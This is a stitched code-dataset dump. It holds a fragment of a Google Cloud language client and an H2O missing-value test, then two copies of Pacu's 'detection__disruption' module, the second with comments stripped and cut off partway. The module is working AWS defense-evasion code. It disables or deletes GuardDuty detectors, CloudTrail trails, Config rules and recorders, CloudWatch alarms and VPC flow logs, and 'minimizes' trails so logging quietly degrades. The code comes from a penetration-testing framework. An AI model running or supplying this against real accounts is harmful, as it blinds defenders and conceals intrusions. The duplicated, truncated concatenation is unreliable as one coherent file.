] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_sentiment,
default_retry=self._method_configs["AnalyzeSentiment"].retry,
default_timeout=self._method_configs["AnalyzeSentiment"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeSentimentRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_sentiment"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_entities(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "analyze_entities" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_entities"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_entities,
default_retry=self._method_configs["AnalyzeEntities"].retry,
default_timeout=self._method_configs["AnalyzeEntities"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeEntitiesRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_entities"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_entity_sentiment(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "analyze_entity_sentiment" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_entity_sentiment"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_entity_sentiment,
default_retry=self._method_configs["AnalyzeEntitySentiment"].retry,
default_timeout=self._method_configs["AnalyzeEntitySentiment"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeEntitySentimentRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_entity_sentiment"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_syntax(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "analyze_syntax" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_syntax"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_syntax,
default_retry=self._method_configs["AnalyzeSyntax"].retry,
default_timeout=self._method_configs["AnalyzeSyntax"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeSyntaxRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_syntax"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def classify_text(
self,
document,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "classify_text" not in self._inner_api_calls:
self._inner_api_calls[
"classify_text"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.classify_text,
default_retry=self._method_configs["ClassifyText"].retry,
default_timeout=self._method_configs["ClassifyText"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.ClassifyTextRequest(document=document)
return self._inner_api_calls["classify_text"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def annotate_text(
self,
document,
features,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "annotate_text" not in self._inner_api_calls:
self._inner_api_calls[
"annotate_text"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.annotate_text,
default_retry=self._method_configs["AnnotateText"].retry,
default_timeout=self._method_configs["AnnotateText"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnnotateTextRequest(
document=document, features=features, encoding_type=encoding_type
)
return self._inner_api_calls["annotate_text"](
request, retry=retry, timeout=timeout, metadata=metadata
)
| true
| true
|
1c447f987b088894b1ea955c47d379681276d285
| 935
|
py
|
Python
|
h2o-py/tests/testdir_munging/pyunit_insert_missing.py
|
kyoren/https-github.com-h2oai-h2o-3
|
77b27109c84c4739f9f1b7a3078f8992beefc813
|
[
"Apache-2.0"
] | 1
|
2016-09-30T05:58:18.000Z
|
2016-09-30T05:58:18.000Z
|
h2o-py/tests/testdir_munging/pyunit_insert_missing.py
|
kyoren/https-github.com-h2oai-h2o-3
|
77b27109c84c4739f9f1b7a3078f8992beefc813
|
[
"Apache-2.0"
] | null | null | null |
h2o-py/tests/testdir_munging/pyunit_insert_missing.py
|
kyoren/https-github.com-h2oai-h2o-3
|
77b27109c84c4739f9f1b7a3078f8992beefc813
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.insert(1, "../../")
import h2o, tests
def insert_missing():
    # The test framework connects to a pre-existing cluster; build a small test frame
data = [[1, 2, 3, 1, 'a', 1, 9],
[1, 6, 4, 2, 'a', 1, 9],
[2, 3, 8, 6, 'b', 1, 9],
[3, 4, 3, 2, 'b', 3, 8],
[4, 5, 9, 5, 'c', 2, 8],
            [5, 7, 10, 7, 'b', 8, 8]]
h2o_data = h2o.H2OFrame(python_obj=data)
    h2o_data.insert_missing_values(fraction=0.0)
num_nas = sum([h2o_data[c].isna().sum() for c in range(h2o_data.ncol)])
assert num_nas == 0, "Expected no missing values inserted, but got {0}".format(num_nas)
    h2o_data.insert_missing_values(fraction=1.0)
num_nas = sum([h2o_data[c].isna().sum() for c in range(h2o_data.ncol)])
assert num_nas == h2o_data.nrow*h2o_data.ncol, "Expected all missing values inserted, but got {0}".format(num_nas)
if __name__ == "__main__":
tests.run_test(sys.argv, insert_missing)
| 33.392857
| 118
| 0.581818
|
import sys
sys.path.insert(1, "../../")
import h2o, tests
def insert_missing():
data = [[1, 2, 3, 1, 'a', 1, 9],
[1, 6, 4, 2, 'a', 1, 9],
[2, 3, 8, 6, 'b', 1, 9],
[3, 4, 3, 2, 'b', 3, 8],
[4, 5, 9, 5, 'c', 2, 8],
            [5, 7, 10, 7, 'b', 8, 8]]
h2o_data = h2o.H2OFrame(python_obj=data)
    h2o_data.insert_missing_values(fraction=0.0)
num_nas = sum([h2o_data[c].isna().sum() for c in range(h2o_data.ncol)])
assert num_nas == 0, "Expected no missing values inserted, but got {0}".format(num_nas)
    h2o_data.insert_missing_values(fraction=1.0)
num_nas = sum([h2o_data[c].isna().sum() for c in range(h2o_data.ncol)])
assert num_nas == h2o_data.nrow*h2o_data.ncol, "Expected all missing values inserted, but got {0}".format(num_nas)
if __name__ == "__main__":
tests.run_test(sys.argv, insert_missing)
| true
| true
|
1c447fa72332939a5d75336dc1a60c443e14a033
| 29,734
|
py
|
Python
|
pacu/modules/detection__disruption/main.py
|
damienjburks/pacu
|
5853f9668a7d78945c40d403bf88a47101ba2b3d
|
[
"BSD-3-Clause"
] | 1
|
2021-12-22T22:39:49.000Z
|
2021-12-22T22:39:49.000Z
|
pacu/modules/detection__disruption/main.py
|
damienjburks/pacu
|
5853f9668a7d78945c40d403bf88a47101ba2b3d
|
[
"BSD-3-Clause"
] | null | null | null |
pacu/modules/detection__disruption/main.py
|
damienjburks/pacu
|
5853f9668a7d78945c40d403bf88a47101ba2b3d
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import argparse
from copy import deepcopy
module_info = {
# Name of the module (should be the same as the filename)
"name": "detection__disruption",
# Name and any other notes about the author
"author": "Spencer Gietzen of Rhino Security Labs",
# Category of the module. Make sure the name matches an existing category.
"category": "EVADE",
# One liner description of the module functionality. This shows up when a user searches for modules.
"one_liner": "Disables, deletes, or minimizes various logging/monitoring services.",
# Full description about what the module does and how it works
"description": "This module will take enumerated CloudTrail trails, GuardDuty detectors, various Config settings, CloudWatch alarms, and VPC flow logs and present you with the option of disabling or deleting each one. For CloudTrail, you also have the option of minimizing it. Minimizing a trail leaves it enabled, but changes all the settings to their very basic level. These changes include: removing the associated SNS topic, disabling global service event logging, disabling multi-regional log collection, disabling log file validation, removing the associated CloudWatch log group/role, and disabling log file encryption. The idea of this is to minimize the amount of logging in the environment without calling dangerous APIs like disable or delete.",
# A list of AWS services that the module utilizes during its execution
"services": [
"GuardDuty",
"CloudTrail",
"EC2",
"Config",
"monitoring",
], # CloudWatch needs to be "monitoring" and VPC needs to be "EC2" here for "ls" to work
    # For prerequisite modules, check whether an existing module already returns the data your module needs before writing that code yourself; that way, session data stays separated and modular.
"prerequisite_modules": ["detection__enum_services"],
# Module arguments to autocomplete when the user hits tab
"arguments_to_autocomplete": [
"--trails",
"--detectors",
"--config-rules",
"--config-recorders",
"--config-aggregators",
"--alarms",
"--flow-logs",
],
}
parser = argparse.ArgumentParser(add_help=False, description=module_info["description"])
parser.add_argument(
"--trails",
required=False,
default=None,
help="Comma-separated list of CloudTrail trail names and regions to target instead of enumerating them. They should be formatted like trail_name@region.",
)
parser.add_argument(
"--detectors",
required=False,
default=None,
help="Comma-separated list of GuardDuty detector IDs and regions to target, instead of enumerating them. They should be formatted like detector_id@region.",
)
parser.add_argument(
"--config-rules",
required=False,
default=None,
help="Comma-separated list of Config rule names and regions to target, instead of enumerating them. They should be formatted like rule_name@region.",
)
parser.add_argument(
"--config-recorders",
required=False,
default=None,
help="Comma-separated list of Config configuration recorder names and regions to target, instead of enumerating them. They should be formatted like recorder_name@region.",
)
parser.add_argument(
"--config-aggregators",
required=False,
default=None,
help="Comma-separated list of Config configuration aggregator names and regions to target, instead of enumerating them. They should be formatted like aggregator_name@region.",
)
parser.add_argument(
"--alarms",
required=False,
default=None,
help="Comma-separated list of CloudWatch alarm names and regions to target, instead of enumerating them. They should be formatted like alarm_name@region.",
)
parser.add_argument(
"--flow-logs",
required=False,
default=None,
help="Comma-separated list of VPC Flow Log IDs and regions to target, instead of enumerating them. They should be formatted like log_id@region.",
)
def main(args, pacu_main):
session = pacu_main.get_active_session()
###### Don't modify these. They can be removed if you are not using the function.
args = parser.parse_args(args)
print = pacu_main.print
input = pacu_main.input
fetch_data = pacu_main.fetch_data
get_regions = pacu_main.get_regions
######
gd_regions = get_regions("guardduty")
ct_regions = get_regions("cloudtrail")
config_regions = get_regions("config")
cw_regions = get_regions("monitoring")
vpc_regions = get_regions("ec2")
trails = []
detectors = []
rules = []
recorders = []
aggregators = []
alarms = []
flow_logs = []
summary_data = {}
    # If any arguments are passed in, that means we should not check the
    # database to see what still needs to be enumerated
if any(
[
args.alarms,
args.trails,
args.flow_logs,
args.detectors,
args.config_rules,
args.config_recorders,
args.config_aggregators,
]
):
if args.trails is not None:
ct_regions = set()
for trail in args.trails.split(","):
name, region = trail.split("@")
trails.append({"Name": name, "Region": region})
ct_regions.add(region)
if args.detectors is not None:
gd_regions = set()
for detector in args.detectors.split(","):
id, region = detector.split("@")
detectors.append({"Id": id, "Region": region})
gd_regions.add(region)
tmp_config_regions = set()
if args.config_rules is not None:
for rule in args.config_rules.split(","):
name, region = rule.split("@")
rules.append({"ConfigRuleName": name, "Region": region})
tmp_config_regions.add(region)
if args.config_recorders is not None:
            for recorder in args.config_recorders.split(","):
name, region = recorder.split("@")
recorders.append({"name": name, "Region": region})
tmp_config_regions.add(region)
if args.config_aggregators is not None:
for aggregator in args.config_aggregators.split(","):
name, region = aggregator.split("@")
aggregators.append(
{"ConfigurationAggregatorName": name, "Region": region}
)
tmp_config_regions.add(region)
if len(tmp_config_regions) > 0:
config_regions = tmp_config_regions
if args.alarms is not None:
cw_regions = set()
for alarm in args.alarms.split(","):
name, region = alarm.split("@")
alarms.append({"AlarmName": name, "Region": region})
cw_regions.add(region)
if args.flow_logs is not None:
vpc_regions = set()
for log in args.flow_logs.split(","):
id, region = log.split("@")
flow_logs.append({"FlowLogId": id, "Region": region})
vpc_regions.add(region)
else:
# No arguments passed in, so disrupt everything. We need to
# figure out what data from enum_monitoring is missing, so
# that multiple calls are not required. This is done by
# building an argument string after checking the DB.
arguments = []
cloudtrail_data = deepcopy(session.CloudTrail)
guardduty_data = deepcopy(session.GuardDuty)
config_data = deepcopy(session.Config)
vpc_data = deepcopy(session.VPC)
cloudwatch_data = deepcopy(session.CloudWatch)
if "Trails" not in cloudtrail_data:
arguments.append("--cloud-trail")
else:
trails = cloudtrail_data["Trails"]
if "Detectors" not in guardduty_data:
arguments.append("--guard-duty")
else:
detectors = guardduty_data["Detectors"]
# If Rules isn't in there, then none of the other stuff has been enumerated either
if "Rules" not in config_data:
arguments.append("--config")
else:
rules = config_data["Rules"]
recorders = config_data["Recorders"]
aggregators = config_data["Aggregators"]
if "Alarms" not in cloudwatch_data:
arguments.append("--cloud-watch")
else:
alarms = cloudwatch_data["Alarms"]
if "FlowLogs" not in vpc_data:
arguments.append("--vpc")
else:
flow_logs = vpc_data["FlowLogs"]
# If there is missing data, run enum_monitoring
if len(arguments) > 0:
if (
fetch_data(
["Logging/Monitoring Data"],
module_info["prerequisite_modules"][0],
" ".join(arguments),
)
is False
):
print(
"Pre-req module not run successfully. Only targeting services that currently have valid data...\n"
)
else:
trails = deepcopy(session.CloudTrail["Trails"])
detectors = deepcopy(session.GuardDuty["Detectors"])
rules = deepcopy(session.Config["Rules"])
recorders = deepcopy(session.Config["Recorders"])
aggregators = deepcopy(session.Config["Aggregators"])
alarms = deepcopy(session.CloudWatch["Alarms"])
flow_logs = deepcopy(session.VPC["FlowLogs"])
if len(detectors) > 0:
print("Starting GuardDuty...\n")
summary_data["guardduty"] = {
"disabled": 0,
"deleted": 0,
}
for region in gd_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("guardduty", region)
for detector in detectors:
if detector["Region"] == region:
action = (
input(
" GuardDuty detector ID: {}\n Do you want to disable (dis), delete (del), or skip (s) it? (dis/del/s) ".format(
detector["Id"]
)
)
.strip()
.lower()
)
if action == "dis":
try:
client.update_detector(
DetectorId=detector["Id"], Enable=False
)
print(
" Successfully disabled detector {}!\n".format(
detector["Id"]
)
)
summary_data["guardduty"]["disabled"] += 1
except Exception as error:
print(
" Could not disable detector {}:\n {}\n".format(
detector["Id"], error
)
)
elif action == "del":
try:
client.delete_detector(DetectorId=detector["Id"])
print(
" Successfully deleted detector {}!\n".format(
detector["Id"]
)
)
summary_data["guardduty"]["deleted"] += 1
except Exception as error:
print(
" Could not delete detector {}:\n {}\n".format(
detector["Id"], error
)
)
else:
print(" Skipping detector {}...\n".format(detector["Id"]))
print("GuardDuty finished.\n")
else:
print("No detectors found. Skipping GuardDuty...\n")
if len(trails) > 0:
print("Starting CloudTrail...\n")
summary_data["cloudtrail"] = {
"disabled": 0,
"deleted": 0,
"minimized": 0,
}
for region in ct_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("cloudtrail", region)
for trail in trails:
if trail["Region"] == region:
action = (
input(
" CloudTrail trail name: {}\n Do you want to disable (dis), delete (del), minimize (m), or skip (s) it? (dis/del/m/s) ".format(
trail["Name"]
)
)
.strip()
.lower()
)
if action == "dis":
try:
client.stop_logging(Name=trail["Name"])
print(
" Successfully disabled trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["disabled"] += 1
except Exception as error:
print(
" Could not disable trail {}:\n {}\n".format(
trail["Name"], error
)
)
elif action == "del":
try:
client.delete_trail(Name=trail["Name"])
print(
" Successfully deleted trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["deleted"] += 1
except Exception as error:
print(
" Could not delete trail {}:\n {}\n".format(
trail["Name"], error
)
)
elif action == "m":
try:
client.update_trail(
Name=trail["Name"],
SnsTopicName="",
IncludeGlobalServiceEvents=False,
IsMultiRegionTrail=False,
EnableLogFileValidation=False,
CloudWatchLogsLogGroupArn="",
CloudWatchLogsRoleArn="",
KmsKeyId="",
)
print(
" Successfully minimized trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["minimized"] += 1
except Exception as error:
print(
" Could not minimize trail {}:\n {}\n".format(
trail["Name"], error
)
)
else:
print(" Skipping trail {}...\n".format(trail["Name"]))
print("CloudTrail finished.\n")
else:
print("No trails found. Skipping CloudTrail...\n")
if len(rules) > 0:
print("Starting Config rules...\n")
summary_data["awsconfig"] = {
"rules": {
"deleted": 0,
},
"recorders": {
"deleted": 0,
"stopped": 0,
},
"aggregators": {
"deleted": 0,
},
}
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for rule in rules:
if rule["Region"] == region:
action = (
input(
" Rule Name: {}\n Do you want to delete this rule? (y/n) ".format(
rule["ConfigRuleName"]
)
)
.strip()
.lower()
)
if action == "y":
try:
client.delete_config_rule(
ConfigRuleName=rule["ConfigRuleName"]
)
print(
" Successfully deleted rule {}!\n".format(
rule["ConfigRuleName"]
)
)
summary_data["awsconfig"]["rules"]["deleted"] += 1
except Exception as error:
print(
" Could not delete rule {}:\n {}\n".format(
rule["ConfigRuleName"], error
)
)
else:
print(
" Skipping rule {}...\n".format(
rule["ConfigRuleName"]
)
)
print("Config rules finished.\n")
else:
print("No rules found. Skipping Config rules...\n")
if len(recorders) > 0:
print("Starting Config recorders...\n")
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for recorder in recorders:
if recorder["Region"] == region:
action = (
input(
" Recorder Name: {}\n Do you want to stop (stop), delete (del), or skip (skip) this recorder? (stop/del/skip) ".format(
recorder["name"]
)
)
.strip()
.lower()
)
if action == "del":
try:
client.delete_configuration_recorder(
ConfigurationRecorderName=recorder["name"]
)
print(
" Successfully deleted recorder {}!\n".format(
recorder["name"]
)
)
summary_data["awsconfig"]["recorders"]["deleted"] += 1
except Exception as error:
print(
" Could not delete recorder {}:\n {}\n".format(
recorder["name"], error
)
)
elif action == "stop":
try:
client.stop_configuration_recorder(
ConfigurationRecorderName=recorder["name"]
)
print(
" Successfully stopped recorder {}!\n".format(
recorder["name"]
)
)
summary_data["awsconfig"]["recorders"]["stopped"] += 1
except Exception as error:
print(
" Could not stop recorder {}:\n {}\n".format(
recorder["name"], error
)
)
else:
print(
" Skipping recorder {}...\n".format(recorder["name"])
)
print("Config recorders finished.\n")
else:
print("No recorders found. Skipping Config recorders...\n")
if len(aggregators) > 0:
print("Starting Config aggregators...\n")
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for aggregator in aggregators:
if aggregator["Region"] == region:
action = (
input(
" Aggregator Name: {}\n Do you want to delete this aggregator? (y/n) ".format(
aggregator["ConfigurationAggregatorName"]
)
)
.strip()
.lower()
)
if action == "y":
try:
client.delete_configuration_aggregator(
ConfigurationAggregatorName=aggregator[
"ConfigurationAggregatorName"
]
)
print(
" Successfully deleted aggregator {}!\n".format(
aggregator["ConfigurationAggregatorName"]
)
)
summary_data["awsconfig"]["aggregators"]["deleted"] += 1
except Exception as error:
print(
" Could not delete aggregator {}:\n {}\n".format(
aggregator["ConfigurationAggregatorName"], error
)
)
else:
print(
" Skipping aggregator {}...\n".format(
aggregator["ConfigurationAggregatorName"]
)
)
print("Config aggregators finished.\n")
else:
print("No aggregators found. Skipping Config aggregators...\n")
if len(alarms) > 0:
print("Starting CloudWatch alarms...\n")
summary_data["cloudwatch"] = {
"deleted": 0,
"disabled": 0,
}
for region in cw_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("cloudwatch", region)
for alarm in alarms:
if alarm["Region"] == region:
action = (
input(
" Alarm Name: {}\n Do you want to disable the associated actions (dis), delete (del), or skip (s) this alarm? (dis/del/s) ".format(
alarm["AlarmName"]
)
)
.strip()
.lower()
)
if action == "del":
try:
# delete_alarms can take multiple alarm names in one request,
# but if there are ANY errors, no alarms are deleted, so I
# chose to do one at a time here
client.delete_alarms(AlarmNames=[alarm["AlarmName"]])
print(
" Successfully deleted alarm {}!\n".format(
alarm["AlarmName"]
)
)
summary_data["cloudwatch"]["deleted"] += 1
except Exception as error:
print(
" Could not delete alarm {}:\n {}\n".format(
alarm["AlarmName"], error
)
)
elif action == "dis":
try:
client.disable_alarm_actions(
AlarmNames=[alarm["AlarmName"]]
)
print(
" Successfully disabled actions for alarm {}!\n".format(
alarm["AlarmName"]
)
)
summary_data["cloudwatch"]["disabled"] += 1
except Exception as error:
print(
" Could not disable actions for alarm {}:\n {}\n".format(
alarm["AlarmName"], error
)
)
else:
print(
" Skipping alarm {}...\n".format(alarm["AlarmName"])
)
print("CloudWatch alarms finished.\n")
else:
print("No alarms found. Skipping CloudWatch...\n")
if len(flow_logs) > 0:
print("Starting VPC flow logs...\n")
summary_data["vpc"] = {"deleted": 0}
for region in vpc_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("ec2", region)
logs_to_delete = []
for log in flow_logs:
if log["Region"] == region:
action = (
input(
" Flow Log ID: {}\n Do you want to delete this flow log? (y/n) ".format(
log["FlowLogId"]
)
)
.strip()
.lower()
)
if action == "y":
logs_to_delete.append(log["FlowLogId"])
print(
" Added flow log {} to list of logs to delete.".format(
log["FlowLogId"]
)
)
else:
print(
" Skipping flow log {}...\n".format(log["FlowLogId"])
)
            # delete_flow_logs is batched: unlike delete_alarms above, it
            # deletes what it can and reports per-log failures in the response
            if logs_to_delete:
                try:
                    response = client.delete_flow_logs(FlowLogIds=logs_to_delete)
                    print(
                        "      Attempt to delete all flow logs succeeded. Read the output for more information on any failures:\n        {}\n".format(
                            response
                        )
                    )
                    summary_data["vpc"]["deleted"] += len(logs_to_delete) - len(
                        response["Unsuccessful"]
                    )
                except Exception as error:
                    print(
                        "      Attempt to delete flow logs failed:\n        {}\n".format(
                            error
                        )
                    )
print("VPC flow logs finished.\n")
else:
print("No flow logs found. Skipping VPC...\n")
return summary_data
def summary(data, pacu_main):
out = ""
if "guardduty" in data:
out += " GuardDuty:\n"
out += " {} detector(s) disabled.\n".format(data["guardduty"]["disabled"])
out += " {} detector(s) deleted.\n".format(data["guardduty"]["deleted"])
if "cloudtrail" in data:
out += " CloudTrail:\n"
out += " {} trail(s) disabled.\n".format(data["cloudtrail"]["disabled"])
out += " {} trail(s) deleted.\n".format(data["cloudtrail"]["deleted"])
out += " {} trail(s) minimized.\n".format(data["cloudtrail"]["minimized"])
if "awsconfig" in data:
out += " AWSConfig:\n"
out += " Rules:\n"
out += " {} rule(s) deleted.\n".format(
data["awsconfig"]["rules"]["deleted"]
)
out += " Recorders:\n"
out += " {} recorder(s) deleted.\n".format(
data["awsconfig"]["recorders"]["deleted"]
)
out += " {} recorder(s) stopped.\n".format(
data["awsconfig"]["recorders"]["stopped"]
)
out += " Aggregators:\n"
out += " {} aggregator(s) deleted.\n".format(
data["awsconfig"]["aggregators"]["deleted"]
)
if "vpc" in data:
out += " VPC:\n"
out += " {} flow log(s) deleted.\n".format(data["vpc"]["deleted"])
return out
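# A minimal sketch of the module's name@region target format, using a
# hypothetical --trails value; it mirrors the parsing loop in main() above.
if __name__ == "__main__":
    demo_parser = argparse.ArgumentParser(add_help=False)
    demo_parser.add_argument("--trails", required=False, default=None)
    demo_args = demo_parser.parse_args(
        ["--trails", "prod-trail@us-east-1,audit-trail@eu-west-1"]
    )
    demo_trails, demo_regions = [], set()
    for target in demo_args.trails.split(","):
        name, region = target.split("@")
        demo_trails.append({"Name": name, "Region": region})
        demo_regions.add(region)
    print(demo_trails)           # [{'Name': 'prod-trail', 'Region': 'us-east-1'}, ...]
    print(sorted(demo_regions))  # ['eu-west-1', 'us-east-1']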
| 41.997175
| 760
| 0.438723
|
import argparse
from copy import deepcopy
module_info = {
"name": "detection__disruption",
"author": "Spencer Gietzen of Rhino Security Labs",
"category": "EVADE",
"one_liner": "Disables, deletes, or minimizes various logging/monitoring services.",
"description": "This module will take enumerated CloudTrail trails, GuardDuty detectors, various Config settings, CloudWatch alarms, and VPC flow logs and present you with the option of disabling or deleting each one. For CloudTrail, you also have the option of minimizing it. Minimizing a trail leaves it enabled, but changes all the settings to their very basic level. These changes include: removing the associated SNS topic, disabling global service event logging, disabling multi-regional log collection, disabling log file validation, removing the associated CloudWatch log group/role, and disabling log file encryption. The idea of this is to minimize the amount of logging in the environment without calling dangerous APIs like disable or delete.",
"services": [
"GuardDuty",
"CloudTrail",
"EC2",
"Config",
"monitoring",
],
"prerequisite_modules": ["detection__enum_services"],
"arguments_to_autocomplete": [
"--trails",
"--detectors",
"--config-rules",
"--config-recorders",
"--config-aggregators",
"--alarms",
"--flow-logs",
],
}
parser = argparse.ArgumentParser(add_help=False, description=module_info["description"])
parser.add_argument(
"--trails",
required=False,
default=None,
help="Comma-separated list of CloudTrail trail names and regions to target instead of enumerating them. They should be formatted like trail_name@region.",
)
parser.add_argument(
"--detectors",
required=False,
default=None,
help="Comma-separated list of GuardDuty detector IDs and regions to target, instead of enumerating them. They should be formatted like detector_id@region.",
)
parser.add_argument(
"--config-rules",
required=False,
default=None,
help="Comma-separated list of Config rule names and regions to target, instead of enumerating them. They should be formatted like rule_name@region.",
)
parser.add_argument(
"--config-recorders",
required=False,
default=None,
help="Comma-separated list of Config configuration recorder names and regions to target, instead of enumerating them. They should be formatted like recorder_name@region.",
)
parser.add_argument(
"--config-aggregators",
required=False,
default=None,
help="Comma-separated list of Config configuration aggregator names and regions to target, instead of enumerating them. They should be formatted like aggregator_name@region.",
)
parser.add_argument(
"--alarms",
required=False,
default=None,
help="Comma-separated list of CloudWatch alarm names and regions to target, instead of enumerating them. They should be formatted like alarm_name@region.",
)
parser.add_argument(
"--flow-logs",
required=False,
default=None,
help="Comma-separated list of VPC Flow Log IDs and regions to target, instead of enumerating them. They should be formatted like log_id@region.",
)
def main(args, pacu_main):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions
    gd_regions = get_regions("guardduty")
    ct_regions = get_regions("cloudtrail")
    config_regions = get_regions("config")
    cw_regions = get_regions("monitoring")
    vpc_regions = get_regions("ec2")
trails = []
detectors = []
rules = []
recorders = []
aggregators = []
alarms = []
flow_logs = []
summary_data = {}
    # If any arguments are passed in, that means we should not check the
    # database to see what still needs to be enumerated
if any(
[
args.alarms,
args.trails,
args.flow_logs,
args.detectors,
args.config_rules,
args.config_recorders,
args.config_aggregators,
]
):
if args.trails is not None:
ct_regions = set()
for trail in args.trails.split(","):
name, region = trail.split("@")
trails.append({"Name": name, "Region": region})
ct_regions.add(region)
if args.detectors is not None:
gd_regions = set()
for detector in args.detectors.split(","):
id, region = detector.split("@")
detectors.append({"Id": id, "Region": region})
gd_regions.add(region)
tmp_config_regions = set()
if args.config_rules is not None:
for rule in args.config_rules.split(","):
name, region = rule.split("@")
rules.append({"ConfigRuleName": name, "Region": region})
tmp_config_regions.add(region)
if args.config_recorders is not None:
            for recorder in args.config_recorders.split(","):
name, region = recorder.split("@")
recorders.append({"name": name, "Region": region})
tmp_config_regions.add(region)
if args.config_aggregators is not None:
for aggregator in args.config_aggregators.split(","):
name, region = aggregator.split("@")
aggregators.append(
{"ConfigurationAggregatorName": name, "Region": region}
)
tmp_config_regions.add(region)
if len(tmp_config_regions) > 0:
config_regions = tmp_config_regions
if args.alarms is not None:
cw_regions = set()
for alarm in args.alarms.split(","):
name, region = alarm.split("@")
alarms.append({"AlarmName": name, "Region": region})
cw_regions.add(region)
if args.flow_logs is not None:
vpc_regions = set()
for log in args.flow_logs.split(","):
id, region = log.split("@")
flow_logs.append({"FlowLogId": id, "Region": region})
vpc_regions.add(region)
else:
# No arguments passed in, so disrupt everything. We need to
# figure out what data from enum_monitoring is missing, so
# that multiple calls are not required. This is done by
# building an argument string after checking the DB.
arguments = []
cloudtrail_data = deepcopy(session.CloudTrail)
guardduty_data = deepcopy(session.GuardDuty)
config_data = deepcopy(session.Config)
vpc_data = deepcopy(session.VPC)
cloudwatch_data = deepcopy(session.CloudWatch)
if "Trails" not in cloudtrail_data:
arguments.append("--cloud-trail")
else:
trails = cloudtrail_data["Trails"]
if "Detectors" not in guardduty_data:
arguments.append("--guard-duty")
else:
detectors = guardduty_data["Detectors"]
# If Rules isn't in there, then none of the other stuff has been enumerated either
if "Rules" not in config_data:
arguments.append("--config")
else:
rules = config_data["Rules"]
recorders = config_data["Recorders"]
aggregators = config_data["Aggregators"]
if "Alarms" not in cloudwatch_data:
arguments.append("--cloud-watch")
else:
alarms = cloudwatch_data["Alarms"]
if "FlowLogs" not in vpc_data:
arguments.append("--vpc")
else:
flow_logs = vpc_data["FlowLogs"]
if len(arguments) > 0:
if (
fetch_data(
["Logging/Monitoring Data"],
module_info["prerequisite_modules"][0],
" ".join(arguments),
)
is False
):
print(
"Pre-req module not run successfully. Only targeting services that currently have valid data...\n"
)
else:
trails = deepcopy(session.CloudTrail["Trails"])
detectors = deepcopy(session.GuardDuty["Detectors"])
rules = deepcopy(session.Config["Rules"])
recorders = deepcopy(session.Config["Recorders"])
aggregators = deepcopy(session.Config["Aggregators"])
alarms = deepcopy(session.CloudWatch["Alarms"])
flow_logs = deepcopy(session.VPC["FlowLogs"])
if len(detectors) > 0:
print("Starting GuardDuty...\n")
summary_data["guardduty"] = {
"disabled": 0,
"deleted": 0,
}
for region in gd_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("guardduty", region)
for detector in detectors:
if detector["Region"] == region:
action = (
input(
" GuardDuty detector ID: {}\n Do you want to disable (dis), delete (del), or skip (s) it? (dis/del/s) ".format(
detector["Id"]
)
)
.strip()
.lower()
)
if action == "dis":
try:
client.update_detector(
DetectorId=detector["Id"], Enable=False
)
print(
" Successfully disabled detector {}!\n".format(
detector["Id"]
)
)
summary_data["guardduty"]["disabled"] += 1
except Exception as error:
print(
" Could not disable detector {}:\n {}\n".format(
detector["Id"], error
)
)
elif action == "del":
try:
client.delete_detector(DetectorId=detector["Id"])
print(
" Successfully deleted detector {}!\n".format(
detector["Id"]
)
)
summary_data["guardduty"]["deleted"] += 1
except Exception as error:
print(
" Could not delete detector {}:\n {}\n".format(
detector["Id"], error
)
)
else:
print(" Skipping detector {}...\n".format(detector["Id"]))
print("GuardDuty finished.\n")
else:
print("No detectors found. Skipping GuardDuty...\n")
